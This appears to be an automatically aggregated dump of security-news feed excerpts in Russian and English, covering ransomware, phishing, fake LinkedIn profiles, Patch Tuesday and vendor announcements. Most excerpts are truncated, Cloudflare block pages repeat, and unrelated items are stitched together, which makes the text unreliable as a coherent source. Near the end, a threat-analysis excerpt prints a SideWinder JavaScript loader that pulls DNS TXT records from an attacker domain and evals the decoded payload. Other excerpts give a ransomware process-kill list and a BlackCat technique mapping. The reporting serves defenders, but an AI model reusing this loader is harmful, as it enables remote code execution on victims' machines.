На днях смотрел видео от Hashicorp и был приятно удивлен, что они сопровождают свои вебинары сурдопереводчиком для глухонемых. Я давно такого не видел, а тут еще и тематика такая. Показалось, что это прям очень круто!Я в этой теме полный профан, но знаю что там существует несколько диалектов, и в целом язык может отличаться в зависимости от географии.Интересно как он пополняется новыми жестами, ведь в IT куча сленговых слов и аббревиатур. А еще кажется можно это автоматизировать и визуализировать в режиме реального времени без участия человека, хотя с человеком это наверное намного приятнее. Крутая и узкоспециализированная профессия с погружением в область.Кажется в текущих реалиях таких шт…

​​Сегодня частично затронем тему EndpointSecurity и поговорим про инструмент osquery. Исторически osquery сделали инфраструктурщики в Facebook, под свои задачи еще в 2013, а после публикации в опенсорс он завоевал сердечки и остальных.Эта штука способа превратить ОС в реляционную базу данных, а вас вооружить всей мощью SQL чтобы с этими данными работать.Глянуть историю процессов в динамике, найти стремные файлы используя YARA-правила или отобразить открытые порты — проще простого, собрать все недавние http запросы, включая JA3 от TLS — изи, нужно что-то посложнее? На самом деле все ограничивается вашей фантазией потому что у osquery есть свой SDK и возможность подключения расширений, написа…

Ого, а вы наверное и забыли, что подписаны на этот канал?Судя по датам последних публикаций канал перешел в режим один пост в пол года. Причины этому максимально банальны — большое кол-во работы и как следствие частичная потеря интереса к ИБ. Как там это сейчас называется, выгорание?За последний год удалось позаниматься интереснейшими проектами, задачами, пообщаться с крутыми специалистами и восстановиться.Лишний раз убедился, что в ИТ и ИБ огромное количество талантливых и умных людей, которые вне публичного поля и просто тихо делают свою работу, делают ее по-настоящему!Еще нужно сказать, что очень важно уметь делать перерывы и успевать просто пожить.Основная идея этого лиричного текста в …

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

Diplomatic code cracked after 500 years:In painstaking work backed by computers, Pierrot found “distinct families” of about 120 symbols used by Charles V. “Whole words are encrypted with a single symbol” and the emperor replaced vowels coming after consonants with marks, she said, an inspiration probably coming from Arabic.

In another obstacle, he used meaningless symbols to mislead any adversary trying to decipher the message.

The breakthrough came in June when Pierrot managed to make out a phrase in the letter, and the team then cracked the code with the help of Camille Desenclos, a historian.

“It was painstaking and long work but there was really a breakthrough that happened in one day, …

The logs showed that technicians from six of the locations had accessed personal data and that two of those shops also copied data onto a personal device.

As noted earlier, two of the visits resulted in the logs the researchers relied on being unrecoverable.

[…]The laptops were freshly imaged Windows 10 laptops.

All of the laptops were set up with email and gaming accounts and populated with browser history across several weeks.

The researchers added documents, both sexually revealing and non-sexual pictures, and a cryptocurrency wallet with credentials.

There was a small systems error.

Please try refreshing the page and if the error is still there drop us a note and let us know.

Apple’s Device Analytics Can Identify iCloud UsersResearchers claim that supposedly anonymous device analytics information can identify users:On Twitter, security researchers Tommy Mysk and Talal Haj Bakry have found that Apple’s device analytics data includes an iCloud account and can be linked directly to a specific user, including their name, date of birth, email, and associated information stored on iCloud.

Apple has long claimed otherwise:On Apple’s device analytics and privacy legal page, the company says no information collected from a device for analytics purposes is traceable back to a specific user.

“iPhone Analytics may include details about hardware and operating system specific…

“If we can recover the RSA-512 Public Key from the registry, we can crack it and get the 256-bit AES Key that encrypts the files!” they wrote.

“The challenge was that they delete the [public key] once the files are fully encrypted.

Memory analysis gave us about a 5-minute window after files were encrypted to retrieve this public key.”Unit 221B ultimately built a “Live CD” version of Linux that victims could run on infected systems to extract that RSA-512 key.

From there, they would load the keys into a cluster of 800 CPUs donated by hosting giant Digital Ocean that would then start cracking them.

The company also used that same donated infrastructure to help victims decrypt their data using…

Researchers have new evidence of how squid brains develop:Researchers from the FAS Center for Systems Biology describe how they used a new live-imaging technique to watch neurons being created in the embryo in almost real-time.

They were then able to track those cells through the development of the nervous system in the retina.

What they saw surprised them.

The neural stem cells they tracked behaved eerily similar to the way these cells behave in vertebrates during the development of their nervous system.

It suggests that vertebrates and cephalopods, despite diverging from each other 500 million years ago, not only are using similar mechanisms to make their big brains but that this process …

Kirkus reviews A Hacker’s Mind:A cybersecurity expert examines how the powerful game whatever system is put before them, leaving it to others to cover the cost.

Every system contains trap doors that can be breached to advantage.

“Any rule can be hacked,” notes the author, be it a religious dietary restriction or a legislative procedure.

With technology, “we can hack more, faster, better,” requiring diligent monitoring and a demand that everyone play by rules that have been hardened against tampering.

An eye-opening, maddening book that offers hope for leveling a badly tilted playing field.

Time-triggered Ethernet (TTE) is used in spacecraft, basically to use the same hardware to process traffic with different timing and criticality.

Researchers have defeated it:On Tuesday, researchers published findings that, for the first time, break TTE’s isolation guarantees.

The result is PCspooF, an attack that allows a single non-critical device connected to a single plane to disrupt synchronization and communication between TTE devices on all planes.

The work was completed by researchers at the University of Michigan, the University of Pennsylvania, and NASA’s Johnson Space Center.

“We also show that, in a simulated spaceflight mission, PCspooF causes uncontrolled maneuvers that threat…

But users have been self-reporting issues on Twitter since the weekend, and WIRED confirmed that on at least some accounts, authentication texts are hours delayed or not coming at all.

The meltdown comes less than two weeks after Twitter laid off about half of its workers, roughly 3,700 people.

Since then, engineers, operations specialists, IT staff, and security teams have been stretched thin attempting to adapt Twitter’s offerings and build new features per new owner Elon Musk’s agenda.

On top of that, it seems that the system has a new vulnerability:A researcher contacted Information Security Media Group on condition of anonymity to reveal that texting “STOP” to the Twitter verification …

Russian Software Company Pretending to Be AmericanComputer code developed by a company called Pushwoosh is in about 8,000 Apple and Google smartphone apps.

Pushwoosh is registered with the Russian government to pay taxes in Russia.

On its website, Pushwoosh says it does not collect sensitive information, and Reuters found no evidence Pushwoosh mishandled user data.

Russian authorities, however, have compelled local companies to hand over user data to domestic security agencies.

I have called supply chain security “an insurmountably hard problem,” and this is just another example of that.

Last month, we were warned not to install Qatar’s World Cup app because it was spyware.

This month, it’s Egypt’s COP27 Summit app:The app is being promoted as a tool to help attendees navigate the event.

But it risks giving the Egyptian government permission to read users’ emails and messages.

Even messages shared via encrypted services like WhatsApp are vulnerable, according to POLITICO’s technical review of the application, and two of the outside experts.

It can also track people’s locations via smartphone’s built-in GPS and Wi-Fi technologies, according to two of the analysts.

Upcoming Speaking EngagementsThis is a current list of where and when I am scheduled to speak:I’m speaking at the 24th International Information Security Conference in Madrid, Spain, on November 17, 2022.

The list is maintained on this page.

Posted on November 14, 2022 at 12:01 PM • 0 Comments

A Digital Red CrossThe International Committee of the Red Cross wants some digital equivalent to the iconic red cross, to alert would-be hackers that they are accessing a medical network.

The emblem wouldn’t provide technical cybersecurity protection to hospitals, Red Cross infrastructure or other medical providers, but it would signal to hackers that a cyberattack on those protected networks during an armed conflict would violate international humanitarian law, experts say, Tilman Rodenhäuser, a legal adviser to the International Committee of the Red Cross, said at a panel discussion hosted by the organization on Thursday.

I can think of all sorts of problems with this idea and many reason…

Peter is an IT manager for a technology manufacturer that got hit with a Russian ransomware strain called “Zeppelin” in May 2020.

There are multiple examples of ransomware groups doing just that after security researchers crowed about finding vulnerabilities in their ransomware code.

“The minute you announce you’ve got a decryptor for some ransomware, they change up the code,” James said.

Jon is another grateful Zeppelin ransomware victim who was aided by Unit 221B’s decryption efforts.

Prior to deploying Zeppelin ransomware, actors spend one to two weeks mapping or enumerating the victim network to identify data enclaves, including cloud storage and network backups, the alert notes.

This candid view inside the Disneyland Team comes from Alex Holden, founder of the Milwaukee-based cybersecurity consulting firm Hold Security.

The panel reveals the gang has been operating dozens of Punycode-based phishing domains for the better part of 2022.

Have a look at the Punycode in this Disneyland Team phishing domain: https://login2.xn--mirtesnbd-276drj[.

Holden says the Disneyland Team is Russian-speaking — if not also based in Russia — but it is not a phishing gang per se.

In case anyone is interested, here (PDF) is a list of all phishing domains currently and previously used by the Disneyland Team.

But according to multiple sources, Penchukov was arrested in Geneva, Switzerland roughly three weeks ago as he was traveling to meet up with his wife there.

This was enough to positively identify Tank as Penchukov, Warner said.

That warning gave Tank ample time to destroy important evidence against the group, and to avoid being home when the raids happened.

It was soon discovered that the phony corporate websites the money mule recruiters used to manage new hires had a security weakness that allowed anyone who signed up at the portal to view messages for every other user.

Another member of the JabberZeus crew — Ukrainian-born Maksim “Aqua” Yakubets — also is currently wanted by the FBI, whi…

Federal law bars states from replacing these benefits using federal funds, and a recent rash of skimming incidents nationwide has disproportionately affected those receiving food assistance via state-issued prepaid debit cards.

On Nov. 4, The Massachusetts Law Reform Institute (MLRI) filed a class action lawsuit on behalf of low-income families whose Supplemental Nutrition and Assistance Program (SNAP) benefits were stolen from their accounts.

“The criminals attach a skimming device on a POS (point of sale) terminal to capture the household’s account information and PIN.

Notably, the USDA did not mention the idea of shifting to chip-based SNAP benefits cards.

For example, she said, Massachu…

Let’s face it: Having “2022 election” in the headline above is probably the only reason anyone might read this story today.

November’s patch batch includes fixes for a whopping six zero-day security vulnerabilities that miscreants and malware are already exploiting in the wild.

CVE-2022-41073 is a zero-day flaw in the Windows Print Spooler, a Windows component that Microsoft has patched mightily over the past year.

The other two zero-day bugs Microsoft patched this month were for vulnerabilities being exploited in Exchange Server.

The mitigation rules are no longer recommended once systems have been patched.”Adobe usually issues security updates for its products on Patch Tuesday, but it did…

Responding to a recent surge in AI-generated bot accounts, LinkedIn is rolling out new features that it hopes will help users make more informed decisions about with whom they choose to connect.

LinkedIn’s new “About This Profile” section — which is visible by clicking the “More” button at the top of a profile — includes the year the account was created, the last time the profile information was updated, and an indication of how and whether an account has been verified.

For example, on October 10, 2022, there were 576,562 LinkedIn accounts that listed their current employer as Apple Inc.

At around the same time, the number of LinkedIn profiles claiming current roles at Amazon fell from roug…

A 25-year-old Finnish man has been charged with extorting a once popular and now-bankrupt online psychotherapy company and its patients.

In late October 2022, Kivimaki was charged (and arrested in absentia, according to the Finns) with attempting to extort money from the Vastaamo Psychotherapy Center.

On Oct. 23, 2020, ransom_man uploaded to the dark web a large compressed file that included all of the stolen Vastaamo patient records.

“According to Vastaamo, the data breach in Vastaamo’s customer databases took place in November 2018,” Iltalehti reported last month.

“According to Vastaamo, Tapio concealed information about the data breach for more than a year and a half.”

KrebsOnSecurity has learned that the defendant was busted in March 2022, after fleeing mandatory military service in Ukraine in the weeks following the Russian invasion.

Security experts say the passwords and other data stolen by Raccoon malware were often resold to groups engaged in deploying ransomware.

Working with investigators in Italy and The Netherlands, U.S. authorities seized a copy of the server used by Raccoon to help customers manage their botnets.

When Russian President Vladimir Putin invaded Ukraine in late February 2022, Sokolovsky was living in Kharkiv, a city in northeast Ukraine that would soon come under heavy artillery bombardment from Russian forces.

Meanwhile, on March…

On October 10, 2022, there were 576,562 LinkedIn accounts that listed their current employer as Apple Inc.

LinkedIn declined to answer questions about the account purges, saying only that the company is constantly working to keep the platform free of fake accounts.

In late September 2022, KrebsOnSecurity warned about the proliferation of fake LinkedIn profiles for Chief Information Security Officer (CISO) roles at some of the world’s largest corporations.

“Even with just a standard LinkedIn account, there’s a pretty good amount of profile information just in the default two-hop networks,” Weaver said.

LinkedIn claims that its security systems detect and block approximately 96 percent of fak…

When a participant uses a SNAP payment card at an authorized retail store, their SNAP EBT account is debited to reimburse the store for food that was purchased.

However, EBT cards differ from debit cards issued to most Americans in two important ways.

In September, authorities in California arrested three men thought to be part of a skimming crew that specifically targeted EBT cards and balances.

That would help address the symptoms of card skimming, but not a root cause.

Hardly anyone is suggesting the obvious, which is to equip EBT cards with the same security technology afforded to practically everyone else participating in the U.S. banking system.

Nick Bax, a security researcher who specializes in tracing cryptocurrency transactions, told KrebsOnSecurity at the time that Antinalysis was likely a clone of AMLBot because the two services generated near-identical results.

]org remains online and accepting requests, as does the service’s Tor-based domain, and it is unclear how those services are sourcing their information.

Smoliar said that following the revelations about Antinalysis, AMLBot audited its entire client base, and implemented the ability to provide APIs only after a contract is signed and the client has been fully audited.

“Incognito was launched in late 2020, and accepts payments in both Bitcoin and Monero, a cryptoasset of…

However, noticeably absent from this month’s Patch Tuesday are any updates to address a pair of zero-day flaws being exploited this past month in Microsoft Exchange Server.

Indeed, Satnam Narang, senior staff research engineer at Tenable, notes that almost half of the security flaws Microsoft patched this week are elevation of privilege bugs.

The lack of Exchange patches leaves a lot of Microsoft customers exposed.

“Despite high hopes that today’s Patch Tuesday release would contain fixes for the vulnerabilities, Exchange Server is conspicuously missing from the initial list of October 2022 security updates.

As always, please consider backing up your system or at least your important docume…

But new data released this week suggests that for some of the nation’s largest banks, reimbursing account takeover victims has become more the exception than the rule.

“In the vast majority of these cases, the banks did not repay the customers that reported being scammed.

A common example of the latter is the Zelle Fraud Scam, which uses an ever-shifting set of come-ons to trick people into transferring money to fraudsters.

Overall, however, the four banks that provided complete data sets indicated that they reimbursed only 47% of the dollar amount of fraud claims they received.

There are, of course, some versions of the Zelle fraud scam that may be confusing financial institutions as to wh…

Last week, KrebsOnSecurity examined a flood of inauthentic LinkedIn profiles all claiming Chief Information Security Officer (CISO) roles at various Fortune 500 companies, including Biogen, Chevron, ExxonMobil, and Hewlett Packard.

Mark Miller is the owner of the DevOps group on LinkedIn, and says he deals with fake profiles on a daily basis — often hundreds per day.

What Taylor called “swarms” of fake accounts Miller described instead as “waves” of incoming requests from phony accounts.

Not long after that, the phony profiles that were not on the company’s list were deleted from LinkedIn.

It remains unclear why LinkedIn has been flooded with so many fake profiles lately, or how the phony p…

As of September 2022, Twitter had challenged 11.72 million accounts, suspended 11,230 accounts, and removed over 97,674 pieces of misleading content related to COVID-19 worldwide. Today? It’s not doing anything. As an update on the company’s COVID-19 misinformation report webpage notes: Effective November 23, 2022, Twitter is no longer enforcing the COVID-19 misleading information policy. … Continue reading "Twitter isn’t going to stop people posting COVID-19 misinformation anymore"

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

ImageUK police are texting 70,000 people who they believe have fallen victim to a worldwide scam that saw fraudsters steal at least £50 million from bank accounts.

200,000 people in the UK, including the elderly and disabled, are thought to have been targeted by conmen who masqueraded as highstreet banks.

The site, set up in December 2020, helped fraudsters steal sensitive information (such as one-time passcodes) from unsuspecting banking customers, allowing the criminals to break into accounts and steal funds.

British police began investigating iSpoof in June 2021, working closely with Europol, Eurojust, the FBI, and Dutch law enforcement authorities.

Finally, the Met Police is leading the…

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by John Hawes of AMTSO.

Hosts:Graham Cluley – @gcluleyCarole Theriault – @caroletheriaultGuest:John HawesEpisode links:Sponsored by:Pentera – Pentera’s Automated Security Validation Platform is designed to help teams increase their security posture against modern day threats across the entire attack surface.

Bitwarden – Password security you can trust.

Support the show:You can help the podcast by telling your friends and colleagues about “Smashing Security”, and leaving us a review on Apple Podcasts or P…

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

Researchers at cybersecurity firm Unit 221B have revealed that they have been secretly helping victims of the Zeppelin ransomware decrypt their computer systems since 2020.

Victims of the Zeppelin ransomware since its emergence in 2019 have included businesses, critical infrastructure organisations, defence contractors, educational institutions, and the healthcare and medical industries.

Or, as a blog post on Unit 221B’s website eloquently puts it:A general Unit 221B rule of thumb around our offices is: “Don’t [REDACTED] with the homeless or sick!

It’s an impressive achievement, which will have helped organisations that badly needed assistance in the aftermath of a Zeppelin ransomware attac…

Being hit by ransomware attack that sees criminals steal information about your staff and passengers…or…Being hit by ransomware attack that sees criminals steal information about your staff and passengers, AND then have the gang tell the world that your firm’s IT infrastructure is so chaotic, poorly-secured, and downright irritating that it refuses to repeat the attack.

That’s the humiliating slap in the face given by the Daixin Team ransomware gang to Air Asia which lost the personal data of five million passengers and all employees earlier this month.

“The group refused to pick through the garbage for a long time.

It seemed that every new system administrator ‘built his shed next to the o…

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by The Cyberwire’s Dave Bittner.

Bitwarden – Password security you can trust.

Support the show:You can help the podcast by telling your friends and colleagues about “Smashing Security”, and leaving us a review on Apple Podcasts or Podchaser.

Follow us:Follow the show on Twitter at @SmashinSecurity, or on Mastodon, on the Smashing Security subreddit, or visit our website for more episodes.

Follow Graham Cluley on Twitter or Mastodon to read more of the exclusive content we post.

Erasing your Twitter DMs doesn’t actually stop Twitter from keeping a copy of your private messages unbeknownst to you, even if you one day completely close your account.

Some final thoughts:Encourage your Twitter buddies to delete their DMs too, so “both sides” of the conversation are wiped.

Even if Twitter doesn’t delete them behind-the-scenes, if *your* account is breached the messages shouldn’t be readily accessible by a hacker.

If Twitter keeps your private messages even after you have requested they are deleted, is that potentially a (costly) GDPR violation?

If you want to keep a permanent record of your DMs (and your other Twitter activity) consider downloading your Twitter archive.

ImageHealthcare organisations in the United States are being warned to be on their guard once again, this time against a family of ransomware known as Venus.

The Venus ransomware attempts to terminate 39 processes associated with database servers and Microsoft office applications:taskkillmsftesql.exesqlagent.exesqlbrowser.exesqlservr.exesqlwriter.exeoracle.exeocssd.exedbsnmp.exesynctime.exemydesktopqos.exeagntsvc.exeisqlplussvc.exexfssvccon.exemydesktopservice.exeocautoupds.exeagntsvc.exeagntsvc.exeagntsvc.exeencsvc.exefirefoxconfig.exetbirdconfig.exeocomm.exemysqld.exemysqld-nt.exemysqld-opt.exedbeng50.exesqbcoreservice.exeexcel.exeinfopath.exemsaccess.exemspub.exeonenote.exeoutlook.exepow…

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

Security researchers at ESET discovered flaws in 25 of its laptop models - including IdeaPads, Slims, and ThinkBooks - that could be used to disable the UEFI Secure Boot process.

That matters because Secure Boot, as its name suggests, is a feature that allows a PC's firmware to be "locked down" as a defence against rootkits, ensuring that only trusted cryptographically-signed code can be run at bootup.

A vulnerability in the laptops' Secure Boot process could open opportunities for cybercriminals to install malicious firmware onto a device that would survive a hard drive being wiped or an operating system being reinstalled.

Lenovo says that as that particular laptop is no longer supported b…

All this and more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, who aren’t joined by a guest this week.

Learn more and take advantage of Sealit’s special offer to “Smashing Security” listeners.

Support the show:You can help the podcast by telling your friends and colleagues about “Smashing Security”, and leaving us a review on Apple Podcasts or Podchaser.

Follow us:Follow the show on Twitter at @SmashinSecurity, or on the Smashing Security subreddit, or visit our website for more episodes.

Follow Graham Cluley on Twitter or Mastodon to read more of the exclusive content we post.

Мы проанализировали основные киберугрозы, с которыми сталкиваются любители спорта на крупных спортивных мероприятиях последних лет, и предлагаем задуматься о защите от подобных проблем и во время нынешнего мундиаля.

Футбольным фанатам предлагают вложиться в новые токены, созданные специально для чемпионата, или делать ставки на результаты соревнований, получая выигрыш в крипте или в виде NFT-арта.

Аналогичные уязвимости, дающие возможность шпионить за пользователями, были найдены прошлой зимой и в китайских приложениях, которые требовалось установить посетителям Зимней Олимпиады.

Лига, конечно, утверждала, что не подслушивает пользователей, поскольку записываемые ею аудиофрагменты закодиров…

Мало кто задумывается, что на самом деле роботы уже давно среди нас.

В связи с этим хочется задать законный вопрос: если уже сейчас на множество организаций работают роботы, то занимается ли кто-нибудь всерьез их безопасностью?

На момент публикации доклада уязвимость так и не была закрыта.

Хорошо хоть, что в этом случае производитель закрыл уязвимости до публикации исследования.

К счастью, далеко не все закрывают глаза на проблемы безопасности роботов: больше половины (51%) респондентов нашего опроса уверены, что роботы уязвимы для хакерских атак.

Вот еще один из «красных флажков» — ссылка на страницу, переведенную при помощи сервиса Google Translate.

Зачем злоумышленники вставляют ссылку на Google TranslateДавайте рассмотрим конкретный пример фишинга при помощи ссылки через Google Translate.

На что нужно обратить внимание, так это на две ссылки снизу («Unsubscribe From This List» и «Manage Email Preferences») и на домен sendgrid.net в ссылке.

Поэтому злоумышленники пропускают свои ссылки через Google Translate — защитные механизмы сервисов видят легитимный домен Google и не считают сайт подозрительным.

В разбираемом нами фишинговом письме пользователя пытались заманить вот сюда:В адресной строке браузера, несмотря на кучу мусорных с…

Это код, которому разработчики вынуждены доверять, так как на его основе реализуются критичные для безопасности системы компоненты.

Раз этот код так критичен, то для защиты системы в первую очередь нужно обеспечить безопасность ее доверенной вычислительной базы.

Давайте найдем параллели и в этот раз.

Кощей поместил свою смерть на кончик иглы, и мы сделаем доверенную вычислительную базу системы как можно меньше.

Система контроля у Кощея вообще дала сбой — не знаем, как он там берег дерево, но атаку на сундук и на все внутренние компоненты прозевал.

Все мы привыкли делать покупки в Интернете, и многие уже не представляют себе жизнь без онлайн-шопинга.

Например, так работают сайты-двойники «Леруа Мерлен» и многочисленные площадки-клоны культурных учреждений, продающие билеты в театры, концертные залы и на стадионы.

Вот несколько простых советов, которые помогут защитить ваши данные и деньги во время онлайн-шопинга.

Лучше всего переводить на карту для онлайн-шопинга ровно столько денег, сколько вы планируете потратить за раз, и делать это непосредственно перед покупкой.

Используйте надежную защитуЭти простые правила помогут сохранить ваши данные и деньги и сделать онлайн-шопинг комфортным и безопасным.

Разбираемся, чем именно опасен майнинг и как защитить от него корпоративные вычислительные мощности.

Первый метод требует огромного количества вычислительных ресурсов, в то время как для второго нужно значительно меньше как участников, так и вычислений — он где-то в несколько тысяч раз эффективнее.

Долгожданный переход произошел недавно, 15 сентября, и в какой-то мере он действительно снизил популярность майнинга.

Если компания предоставляет инфраструктуру или платформу как сервис, то ее клиенты обладают некой степенью свободы в использовании этой инфраструктуры или платформы: могут в целом использовать ее так, как им заблагорассудится, запускать различные приложения, и в том числе — майнер…

Зловредный майнинг на подъемеВ прошлом году цены на криптовалюты выросли до заоблачных высот, а в этом — так же драматически обрушились.

Выяснилось, что в первые три четверти 2022 года примерно в каждом седьмом случае это был вредоносный майнер.

В третьем квартале 2022 года она составила уже 17% (то есть каждый шестой случай), а в целом криптомайнеры стали вторым по распространенности зловредом после шифровальщиков.

Помимо уязвимостей, злоумышленники часто используют для доставки таких зловредов пиратский контент — бесплатные фильмы или музыку, взломанный софт, кряки, читы и так далее.

Как не стать жертвой майнеровЧтобы не делиться не пойми с кем ресурсами вашего компьютера, стоит помнить о…

Помимо этого в письме сообщается, что из-за большого количества жертв в Finanzmarktaufsicht предполагают, что речь идет об организованной преступности.

В этот раз преступники в письме напоминают получателю, что в далеких 2015–2017 годах тот якобы инвестировал в компанию Solid CFD.

Компания, которая упоминается в письме, также реальна и даже имеет сомнительную репутацию (правда, скорее в Великобритании).

Вероятно, мошенники надеются, что им повезет и пользователь согласится обсудить свои инвестиции в почте — с вероятным переводом общения на телефон или в мессенджеры.

Как защититьсяЧтобы не попасть в неприятную ситуацию и не потерять личные данные и деньги, мы рекомендуем:

Анализ тепловых отпечатков проводился как вручную, так и с помощью автоматизированных систем (последние оказались немного эффективнее).

И в том, и в другом случае мы имеем дело с вводом цифровых комбинаций небольшой длины.

Это сводная таблица эффективности:Удивительно, что в половине случаев удалось разгадать даже длинный пароль в 16 символов.

Но подумайте сами: когда телефон узнает вас по лицу и по отпечатку пальца, вы не вводите пароль.

Когда вы используете аппаратный ключ авторизации, вы не вводите пароль.

Платная версия Kaspersky Secure Connection будет продаваться до конца декабря 2022 года.

Бесплатная версия Kaspersky Secure Connection будет доступна до 15 ноября 2022 года.

Например, если у вас установлен Kaspersky Total Security и вы оплатили подписку на Kaspersky Secure Connection, то VPN-приложение будет работать до истечения срока подписки на него.

При отсутствии платной подписки или лицензии на Kaspersky Secure Connection приложение перестанет работать 15 ноября.

Изменения в работе Kaspersky Secure Connection не затронут никакие иные страны, кроме России.

В октябре 2022 года исследователи из компании Trail of Bits опубликовали подробный разбор уязвимости в СУБД SQLite.

Во-первых, она присутствует в SQLite с октября 2000 года, то есть практически с самого начала разработки этого программного продукта с открытым исходным кодом.

Во-вторых, особенности использования SQLite делают теоретически возможной атаку на большой ассортимент программ, которые используют SQLite в своей работе.

Уязвимость была закрыта в версии SQLite 3.39.2, выпущенной в июле 2022 года.

Разработчики ПО, использующие SQLite в составе собственного кода, скорее всего, должны будут обновить свои разработки и распространить новую версию софта.

Давайте посмотрим на цифры: только в этом году было выпущено 7000 тайтлов, которых с нетерпением ждали три миллиарда геймеров по всему миру!

Игры могут быть не только приятным досугом на пару часов в неделю, но и серьезным увлечением.

Если вы нацелены на победу и готовы тратить время, деньги и усилия, рекомендуем ознакомиться с нашим исследованием.

Мы опросили более 10 000 геймеров по всему миру и выяснили, что помогает им побеждать — от характеристик компьютера до моральных аспектов.

Необходимость постоянно практиковаться кажется очевидной, но только 41% опрошенных считают это основой успеха.

Такой способ обеспечивает приватность: сайты видят только адрес последнего компьютера в сети Tor, так называемой выходной ноды, и не могут видеть реальный IP-адрес пользователя.

Кстати, YouTube в Китае также официально недоступен, поэтому видеоролик по определению ориентирован на тех, кто ищет способы обхода блокировок.

Не исключено, что это был далеко не единственный вариант распространения вредоносной программы, и другие были размещены уже на «локальных» ресурсах в Китае.

Однако этот сайт также заблокирован на территории Китая, поэтому поиск альтернативных источников загрузки ПО в данном случае не является чем-то необычным.

Не скачивайте программы по ссылкам из YouTube!

Поэтому мы решили перечислить самые очевидные признаки того, что на компьютере работает вредоносное ПО или им заинтересовались хакеры.

Но это может быть и признаком работы на устройстве постороннего кода.

Если на компьютер прорвался зловред типа adware, то он может начать заменять баннеры на страницах на однотипную рекламу, зачастую сомнительной законности.

Если вы вводите один адрес, а браузер регулярно перенаправляет вас на другой, то и об этом следует рассказать специалистам.

Если такая нотификация появилась без вашего на то согласия или же если вам неожиданно предлагают согласиться на подключение неизвестного — скорее всего, ваш компьютер атакует хакер.

(Feed generated with FetchRSS)

Использованная в атаке программа-вымогатель DeadBolt представляет собой 32-битную программу для Linux/ARM формата ELF, разработанную на языке программирования Go.

Программа была обфусцирована и сжата упаковщиком UPX.

Также из программы удалена идентифицирующая информация о сборке Go.

Анализ такого образца может вызывать некоторые затруднения, поэтому мы более подробно остановимся на описании логики работы DeadBolt.

Для этого мы дополнительно провели полную декомпиляцию кода Go вымогателя.

(Feed generated with FetchRSS)

(Feed generated with FetchRSS)

(Feed generated with FetchRSS)

Решения-прослойки, которые собирают только необходимые данные с систем безопасности для более качественного обнаружения угроз и расширенной аналитики при анализе алертов или отдельных событий.

Тогда на помощь приходят современные EDR-решения (Endpoint Detection and Response), которые собирают много телеметрии с хостов и дают значительно больше возможностей для корреляции, и хантинга за угрозами.

Мы же помним, что задача безопасника — наставить как можно больше препятствий на пути атакующих.

Так появляется новый класс решений, который отвечает за роутинг и фильтрацию событий в SIEM.

С его помощью вы сможете исследовать атакующих, учиться и учить свою команду полноценной охоте за киберугрозам…

(Feed generated with FetchRSS)

;T1078 Valid Accounts;Партнеры BlackCat могут приобретать доступ к сетевой инфраструктуре жертвы на специализированных теневых площадках.

;T1497 Virtualization/Sandbox Evasion;В ALPHV MORPH для противодействия анализу, в том числе и в песочнице, проверяется значение параметра командной строки access-token.

TA0011 Command and Control;T1071 Application Layer Protocol;Применяемые атакующими средства удаленного доступа могут использовать протоколы прикладного уровня (HTTP, HTTPS, DNS).

;T1572 Protocol Tunneling;Для доступа к скомпрометированной системе атакующие могут использовать туннели, построенные с использованием ngrok или gost.

;T1498 Network Denial of Service ;При отказе жертвы выплачива…

(Feed generated with FetchRSS)

(Feed generated with FetchRSS)

let C = 0, P = "", K = "lin9gtmn", R = () => { require("dns").resolveTxt("0x" + C + "."

+ K + ".eccbc8[.

]com", (e, d) => { if (d) { if (P += d.join(""), C++, C < 23) return R(); try { eval(global.dec(K, P)) } catch (a) {} } }) }; R()

Фрагмент SideWinder.AntiBot.Script из https://finance.pakgov[.

]net/salary-a4222e91 function buttonClick() { if (navigator.geolocation) { navigator.geolocation.getCurrentPosition(showPosition); } else { x.innerHTML = 'Geolocation is not supported by this browser.

'; } } function showPosition(position) { alert(`lat ${position.coords.latitude} long ${position.coords.longitude}`); }

(Feed generated with FetchRSS)

(Feed generated with FetchRSS)

Cisco Secure and AWS Security LakeWe are proud to be a launch partner of AWS Security Lake, which allows customers to build a security data lake from integrated cloud and on-premises data sources as well as from their private applications.

Security Lake helps customers optimize security log data retention by optimizing the partitioning of data to improve performance and reduce costs.

Now, analysts and engineers can easily build and use a centralized security data lake to improve the protection of workloads, applications, and data.

By integrating Secure Firewall with AWS Security Lake, through Secure Firewall Management Center, organizations will be able to store firewall logs in a structure…

Security Demo Stand – end-to-end solution portfolio showcase, including Application Security, Extended Detection and Response (XDR), Network Security, Secure Access Service Edge (SASE) and Cloud Security, Secure Analytics, Secure Email, SecureX, Services and Zero Trust Security.

– end-to-end solution portfolio showcase, including Application Security, Extended Detection and Response (XDR), Network Security, Secure Access Service Edge (SASE) and Cloud Security, Secure Analytics, Secure Email, SecureX, Services and Zero Trust Security.

Security Resilience Pod – evaluate and benchmark your security posture , and get recommendations on how to improve existing security programs.

For those joinin…

I am excited to present the first episode of “NEXT” by Cisco Secure!

Second, we want to build a bridge between Cisco Secure and the ideas of the future.

CTO of Cisco Secure, TK Keanini and I sit down with Michael Ebel, CEO of Atmosfy.

